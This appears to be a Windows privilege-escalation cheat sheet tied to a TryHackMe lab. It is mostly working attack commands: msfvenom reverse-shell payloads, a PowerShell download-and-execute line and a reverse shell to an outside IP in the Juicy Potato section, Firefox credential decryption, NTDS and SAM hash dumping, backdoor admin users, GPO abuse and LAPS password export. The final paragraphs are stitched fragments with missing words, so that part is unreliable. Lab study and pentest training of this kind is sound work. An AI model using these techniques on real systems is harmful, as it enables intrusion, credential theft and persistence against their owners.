To install a package with elevated (system) privileges, set the AlwaysInstallElevated value to “1” under both of the following registry keys:

1
2
3

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer

If the AlwaysInstallElevated value is not set to “1” under both of the preceding registry keys, the installer uses elevated privileges to install managed applications and uses the current user’s privilege level for unmanaged applications.

Detection

Windows VM

1. Open command prompt and type:

   1	C:\Temp> reg query HKLM\Software\Policies\Microsoft\Windows\Installer

   • 0x1 means its ON
     

     Картинка с сайта: 0xstarlight.github.io

2. In command prompt type:

   1	C:\Temp>reg query HKCU\Software\Policies\Microsoft\Windows\Installer

   • 0x1 means its ON
     

     Картинка с сайта: 0xstarlight.github.io

From the both output, we notice that “AlwaysInstallElevated” value is 1. Hence, we can abuse this function to get privilege escalation.

Using PowerUp

1. Run Powerup.ps1 and Run Invoke-AllChecks (check the AlwaysInstallElevated field)

   1 2 3

   C:\Temp> powershell -ep bypass PS C:\Temp>. .\PowerUp.sp1 PS C:\Temp> Invoke-AllChecks

   

   Картинка с сайта: 0xstarlight.github.io

2. Run Write-UserAddMSI and Add backdoor user in Administrators group (Required RDP access)

3. Check local Administrators

   1 2	C:\Temp> net localgroup administrators # now backdoor is added to the localgroup administrators group

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f msi -o setup.msi

3. Copy the generated file, setup.msi, to the Windows VM.

Windows VM

1. Place 'setup.msi' in 'C:\Temp'
2. Open command prompt and type:

   1	C:\Temp> msiexec /quiet /qn /i C:\Temp\setup.msi

Kali VM

1. Wait for a reverse shell on your kali machine.

Service Registry

Methodology

A service registry consists of a cluster of servers that use a replication protocol to maintain consistency. Hence if we get Full Contol permission over the registry key, we can drop our malicious executable file to gain administrator access.

Detection

Windows VM

1. Open powershell prompt and type:

   1 2	C:\Temp> powershell -ep bypass PS C:\Temp> Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl

   

   Картинка с сайта: 0xstarlight.github.io

2. Notice that the output suggests that user belong to "NT AUTHORITY\INTERACTIVE" has "FullContol" permission over the registry key.

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe

3. Copy the generated file x.exe, to the Windows VM.

Windows VM

1. Place x.exe in 'C:\Temp'
2. Open command prompt at type:

   1	C:\Temp> reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f

3. In the command prompt type:

   1 2	C:\Temp> sc start regsvc # If it doesnt work try restaring the service and perform the exploit egain

Картинка с сайта: 0xstarlight.github.io

Kali VM

1. Wait for a reverse shell on your kali machine.

Executable Files

Methodology

Microsoft Windows services, formerly known as NT services, enable you to create long-running executable applications that run in their own Windows sessions. These services can be automatically started when the computer boots, can be paused and restarted, and do not show any user interface.

Hence if we get Full Contol permission over the file path location, we can drop our malicious executable file to gain administrator access.

Detection

1. Run Powerup.ps1 and Run Invoke-AllChecks (check the service executable field)

   1 2 3

   C:\Temp> powershell -ep bypass PS C:\Temp>. .\PowerUp.sp1 PS C:\Temp> Invoke-AllChecks

Картинка с сайта: 0xstarlight.github.io

We can see that we have Modifiable File access to "c:\Program Files\File Permissions Service\filepermservice.exe". To gain administrator access, we can drop our malicious executable file on this location.

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o x.exe

3. Copy the generated file x.exe, to the Windows VM and replace it over filepermsvc.exe.

Windows VM

1. In command prompt type:

   1	C:\Temp> sc start filepermsvc

Kali VM

1. Wait for a reverse shell on your kali machine.

Startup Applications

Methodology

Startup apps run in the background, the number of apps running on the system can be significantly more than what the user is aware of and affect system responsiveness. Startup apps are classified to include those leveraging these mechanisms to start:

• Run registry keys (HKLM, HKCU, wow64 nodes included)
• RunOnce registry keys
• Startup folders under the start menu for per user and public locations

So basically, we need full access to the Startup folder. Then by dropping our malicious executable file, we will gain administrator access.

Detection

Windows VM

1. Open command prompt and type:

   1	C:\Temp> icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

   

   Картинка с сайта: 0xstarlight.github.io

2. From the output notice that the "BUILTIN\Users" group has full access '(F)' to the directory.

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o y.exe

3. Copy the generated file, y.exe, to the Windows VM.

Windows VM

1. Place y.exe in "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup".

Kali VM

1. Wait for a reverse shell on your kali machine.

DLL Hijacking

Methodology

Windows applications usually load DLL files when started. It may happen that a DLL file does not exist and the application is unable to load it. Nevertheless, an application will continue to execute as long as the missing DLL is not needed.
In case the application uses a relative and not an absolute file path, Windows searches for the file in the following directories:

• The directory from which the application is loaded
• C:\Windows\System32
• C:\Windows\System
• C:\Windows
• The current working directory
• Directories in the system PATH environment variable
• Directories in the user PATH environment variable

Steps taken to perform DLL hijacking are outlined below.

1. Identify vulnerable application and location
2. Identify applications PID
3. Identify vulnerable DLLs that can be hijacked
4. Use MSFVenom or other payload creation tools to create a malicious DLL
5. Replace the original DLL with the malicious DLL
6. Profit

Detection

Windows VM (RDP is required)

1. Transfer Procmon.exe on the Windows VM
2. Right click on Procmon.exe and select 'Run as administrator' from the menu.
3. In procmon, select "filter". From the left-most drop down menu, select 'Process Name'.
4. In the input box on the same line type: dllhijackservice.exe
5. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the 'Add' button, then 'Apply' and lastly on ‘OK’.
6. Next, select from the left-most drop down menu 'Result'.
7. In the input box on the same line type: NAME NOT FOUND.
8. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the 'Add' button, then 'Apply' and lastly on ‘OK’.

Картинка с сайта: 0xstarlight.github.io

Картинка с сайта: 0xstarlight.github.io

1. Open command prompt and type:

   1	C:\Temp> sc start dllsvc

   

   Картинка с сайта: 0xstarlight.github.io

2. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute 'C:\Temp\hijackme.dll' yet it could not do that as the file was not found. Note that 'C:\Temp' is a writable location.
   

   Картинка с сайта: 0xstarlight.github.io

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f dll -o hijackme.dll

3. Copy the generated file hijackme.dll, to the Windows VM.

Windows VM

1. Place hijackme.dll in 'C:\Temp'
2. Open command prompt and type:

   1	C:\Temp> sc stop dllsvc & sc start dllsvc

Kali VM

1. Wait for a reverse shell on your kali machine.

BinPath

Methodology

BinPath is a type of Service Escalation. We can gain administrator privileges if we write access and restart access on any service. We can abuse this function by injecting our malicious BinPath to get executed once restarted.

Detection

Using Script on Windows VM

1. Run Powerup.ps1 and Run Invoke-AllChecks (check the service permissions field)

1
2
3

C:\Temp> powershell -ep bypass
PS C:\Temp>. .\PowerUp.sp1
PS C:\Temp> Invoke-AllChecks

Картинка с сайта: 0xstarlight.github.io

Checking manually on Windows VM

1. Run AccessChk64.exe

1
2
3
4
5
6
7
8

C:\Temp> accesschk64.exe -uwcv Everyone *

# Switch meaning
# w --> only show items that have write access
# v --> verbose; dispaly as many details as possible
# u --> ignore the errors
# c --> displays service name of the following
# Everyone --> means everyone as a group who hass access

Картинка с сайта: 0xstarlight.github.io

1. Using AccessChk64.exe query the service found

   1	C:\Temp> accesschk64.exe -uwcv daclsvc

   

   Картинка с сайта: 0xstarlight.github.io

2. Find path of the bin file

Картинка с сайта: 0xstarlight.github.io

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o reverse.exe

3. Copy the generated file reverse.exe, to the Windows VM.

Windows VM

1. Place reverse.exe in 'C:\Temp'
2. In command prompt type:

   1	C:\Temp> sc config daclsvc binpath= "C:\Temp\reverse.exe"

3. In command prompt type:

   1	C:\Temp> sc start daclsvc

Kali VM

1. Wait for a reverse shell on your kali machine.

Unquoted Service Paths

Methodology

When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege).

In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument.

Detection

1. Run Powerup.ps1 and Run Invoke-AllChecks (check the unquoted service field)

   1 2 3

   C:\Temp> powershell -ep bypass PS C:\Temp>. .\PowerUp.sp1 PS C:\Temp> Invoke-AllChecks

Картинка с сайта: 0xstarlight.github.io

Exploitation

Kali VM

1. Start a netcat listener
2. Open an additional command prompt and type:

   1	$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[tun0 IP] LPORT=53 -f exe -o common.exe

3. Transfer the generated file, common.exe, to the Windows VM.

Windows VM

1. Place common.exe in 'C:\Program Files\Unquoted Path Service'.
2. Open command prompt and type:

   1 2 3

   C:\Temp> sc start unquotedsvc # OR C:\Temp> net start unquotedsvc

Kali VM

1. Wait for a reverse shell on your kali machine.

Juicy potato attack

Methodology

This privilege allows us to impersonate a token of a privileged account such as NT AUTHORITY\SYSTEM.

Detection

Windows VM

1. We should have SeImpersonatePrivilege privileges enabled
   

   Картинка с сайта: 0xstarlight.github.io

Exploitation

Kali VM

1. Copy Invoke-PowerShellTcp.ps1 from nishang shells as shell.ps1
2. Add the line at the bottom of shell.ps1

   1	Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.31 -Port 9999

3. Lets create a shell.bat file

   1	powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.31/shell.ps1')

4. Transfer shell.bat and juicypotato.exe on victim machine

   1	$ (new-object net.webclient).downloadfile('http://10.10.14.31/file', 'C:\temp\file')

5. Set a listener on port 9999

   1	$ sudo rlwrap nc -lnvp 9999

Windows VM

1. Run juicy potato

   1	$ ./jp.exe -p shell.bat -l 7777 -t *

   • If this fail
   • Try with a different CLSID depending upon the system version and select the CLSID which supports NT AUTHORITY\SYSTEM
   • Link –> http://ohpe.it/juicy-potato/CLSID
2. Lets run again

   1	$ ./jp.exe -p shell.bat -l 7777 -t * -c "{e60687f7-01a1-40aa-86ac-db1cbf673334}"

Kali VM

1. Wait for a reverse shell on your kali machine.

Hot Potato attack

Methodology

Hot Potato takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.

Detection

Windows VM

1. We should have SeImpersonatePrivilege privileges enabled
   

   Картинка с сайта: 0xstarlight.github.io

Exploitation

I will be demonstrating a simple exploitation technique by adding a user to the local administrators group using Tater.ps1

Windows VM

1. Enter the following to gain administrator access

   1 2 3

   C:\Temp> powershell.exe -nop -ep bypass PS C:\Temp> Import-Module C:\Temp\Tater.ps1 PS C:\Temp> Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"

Kernel Exploits

Searcing exploits

This method is handy for checking any existing exploits available for the machine by looking at the system information. From the results of windows-exploit-suggester.py we can select one of the kernel exploits and try to escalate privileges.

Windows VM

1. Run systeminfo and save it into a text file

Kali VM

1. Pass the file thorugh windows-exploit-suggester.py

1
2
3
4
5
6
7
8
9
10
11

$ ./windows-exploit-suggester.py --update

[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2020-06-06-mssb.xlsx
[*] done

$ ./windows-exploit-suggester.py --database 2020-06-06-mssb.xlsx --systeminfo systeminfo.txt 

Exploits will be displayed here...

Password Mining Escalation — Firefox

Detection

1. winpeas
2. Path location :

   1	C:\Temp> C:\Users\usernamehere\AppData\Roaming\Mozilla\Firefox\Profiles

Requirements

Copy the following files from the Windows VM to Kali VM:

1. key4.db
2. logins.json
3. addons.json
4. cert9.db

Exploitation

1. Download the following

   1	$ git clone https://github.com/lclevy/firepwd.git

2. Place the required files in the same directory and run the python file for the creds

1
2
3
4
5
6
7

$ python3 firepwd.py
 
globalSalt: b'2d45b7ac4e42209a23235ecf825c018e0382291d'
<SNIP>
clearText b'86a15457f119f862f8296e4f2f6b97d9b6b6e9cb7a3204760808080808080808'
decrypting login/password pairs
   https://creds.com:b'mayor',b'<<HIDDEN>>'

Runas-Savdcreds

Methodology

We can check if there are any pre-existing credentials of the administrator on the system. We can abuse this by using the loaded creds for privilege escalation. In the below example, I will demonstrate how to read files through the saved creds.

Detection

1. winpeas
2. Checking for existence

1
2
3
4
5

$ cmdkey /list
Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator

Exploitation

1. Reading root flag

1

C:\Temp> C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Windows\System32\cmd.exe /c TYPE c:\Users\Administrator\Desktop\root.txt > C:\Users\security\root1.txt"

Backup Operators (Disk shadow + Robocopy)

Methodology

If the user is a part of the Backup Operator group, the user has the ability to create system backups and could be used to obtain copies of sensitive system files that can be used to retrieve passwords such as the SAM and SYSTEM Registry hives and the NTDS.dit Active Directory database file.

Detection

1. The user should be a part of the Backup Operators group and should have SeBackupPrivilege and SeRestorePrivilege Enabled

1
2

C:\Temp> net user unsername-here
C:\Temp> whoami /all

Exploitation

Kali VM

1. Create this script and transfer it to Windows VM

1
2
3
4
5
6
7
8
9

set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

Windows VM

1. Pass the script to diskshadow unility to create the shadow copy

   1	PS C:\Temp> diskshadow /s script.txt

2. Now copy the NTDS file using Robocopy to the Temp file we created in the C: drive

   1	PS C:\Temp> robocopy /b E:\Windows\ntds . ntds.dit

3. Next we get the system registry hive that contains the key needed to decrypt the NTDS file with reg save command.

   1	PS C:\Temp> reg save hklm\system c:\temp\system.hive

Dumping NTML Hashes

1. We can use secretsdump.py do decrypt the DA creds on Kali VM

1

$ secretsdump.py -ntds ntds.dit -system system.hive LOCAL | tee hash-dump

Abusing GPO permissions

Exploitation

We Abusing GPO by adding the user to the local Administrators group leveraging a tool called SharpGPOAbuse.

Source : https://github.com/FSecureLABS/SharpGPOAbuse

Pre compiled binaries : https://github.com/Flangvik/SharpCollection

• Add user to local administrator groups

1
2
3
4
5
6
7
8
9
10

PS C:\Enterprise-Share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

• Force Update the system

1
2
3
4

PS C:\Enterprise-Share> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.

• Now review our group memberships after we forced the policies to be updated on the target machine.

1
2

PS C:\Enterprise-Share> net user enterprise-security
# Will be added to the administrators group

Export LAPS Passwords

Methodology

The following script assumes that LAPS has already been configured into your environment & that your user account already has access to view LAPS passwords using the Fat Client UI or from Active Directory Users & Computers.

This script loads the Active Directory module, finds the LAPS password fields, and then saves them to a CSV with the date appended to the file name. The only thing you’d need to change is the file path.

Exploitation

1. Just Open Powershell and paste this script

   1 2 3

   $Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime $computers | Export-Csv -path c:\temp\"LAPS-$((Get-Date).ToString("MM-dd-yyyy")).csv" -NoTypeInformation

2. Then, save it to the location of your choice. For this example, I’m saving to

   1	C:\Scripts\LAPSexport.ps1

3. Then, run the script to verify it works correctly. If it does, you should automate this procedure by creating a Scheduled Task.

References

1. https://tryhackme.com/room/windowsprivescarena
2. https://docs.microsoft.com/en-us/

If you find my articles interesting, you can buy me a coffee

The .NET Framework is installed by default on Windows, with :

The creates a local user (using the Win32‘s NetUserAdd API) and add it to the local Administrators group (using the Win32‘s NetLocalGroupAddMembers API). It may be used as a DLL template for PrintNightmare exploitation. Alternatively, a payload DLL may be generated using, for example, msfvenom.

The can be used to locally elevate privileges by either:

Alternatively, the can be used for local privilege escalation purposes (in addition to remote code execution):

By executing a given binary or bat script through a specifically crafted MSI installer using the graphical application or msfvenom.

A more comprehensive list of the access rights for Windows services can be found in the .

For more and updated information on the aforementioned privileges, refer to the GitHub repository.

Exploits of the potato family (except RoguePotato) on Windows 10 build 1809 / Windows 2019 and later.

can be used to automate this process:

The PowerShell cmdlet can also be used to execute code as LocalSystem account (through a Scheduled Task):